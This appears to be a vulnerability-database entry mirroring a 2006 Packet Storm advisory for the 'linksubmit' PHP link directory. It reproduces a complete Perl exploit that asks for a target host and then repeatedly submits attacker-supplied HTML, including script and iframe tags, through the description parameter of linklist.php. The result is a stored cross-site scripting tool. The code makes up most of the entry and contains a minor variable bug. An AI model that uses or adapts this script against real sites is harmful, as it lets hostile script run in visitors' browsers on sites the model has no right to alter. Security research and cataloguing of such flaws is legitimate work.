Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

linksubmit.txt

🗓️ 04 Apr 2006 00:00:00Reported by s3rv3r_hack3rType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Vendor: linksubmit, Version: All versions, Website: http://www.phpselect.com, Vulnerable to submitting HTML tags in $description parameter, Exploit by s3rv3r_hack3r targeting linklist.php allowing iframe and script tags

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Vendor : linksubmit   
Version : All Version   
www : http://www.phpselect.com   
AUTHOR : s3rv3r_hack3r  
you can submit html tag's in $description (linksubmit.php)  
  
Exploit :   
#!/usr/bin/perl  
#  
# Exploit by s3rv3r_hack3r  
# Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..  
######################################################  
# ___ ___ __ #  
# / | \_____ ____ | | __ ___________________ #  
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #  
#\ Y // __ \\ \___| <\ ___/| | \// / #  
# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ #  
# \/ \/ \/ \/ \/ \/ #  
# Iran Hackerz Security Team #  
# WebSite: www.hackerz.ir #  
######################################################  
# Name : linksubmit #  
# Site : http://www.phpselect.com/ #  
######################################################  
#you can use iframe,script and all html tags  
#bug in linklist.php !!  
#www.victim.com/linklist  
use LWP::Simple;  
  
  
print "-------------------------------------------\n";  
print "= Iran hacekerz security team =\n";  
print "= By s3rv3r_hack3r - www.hackerz.ir =\n";  
print "-------------------------------------------\n\n";  
  
  
print "Target >http://";  
chomp($targ = <STDIN>);  
print "your web site name >";  
chomp($wwwname= <STDIN>);  
print "your web site url >";  
chomp($wsurl= <STDIN>);  
print "your email >";  
chomp($mail= <STDIN>);  
  
$con=get("http://".$targ."/linklist.php") || die "[-]Cannot connect to Host";   
while ()   
{   
print "Html code\$";  
chomp($comd=<STDIN>);  
$commd=get("http://".$targ."/linklist.php?wsname=".$wwwname."&wsurl=".url."&email=".$mail."&description=".$comd)  
}  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
04 Apr 2006 00:00Current
7.4High risk
Vulners AI Score7.4
linksubmitall versionshttp://www.phpselect.coms3rv3r_hack3rhtml tagsvulnerabilityexploitlwp::simple
20
.json
Report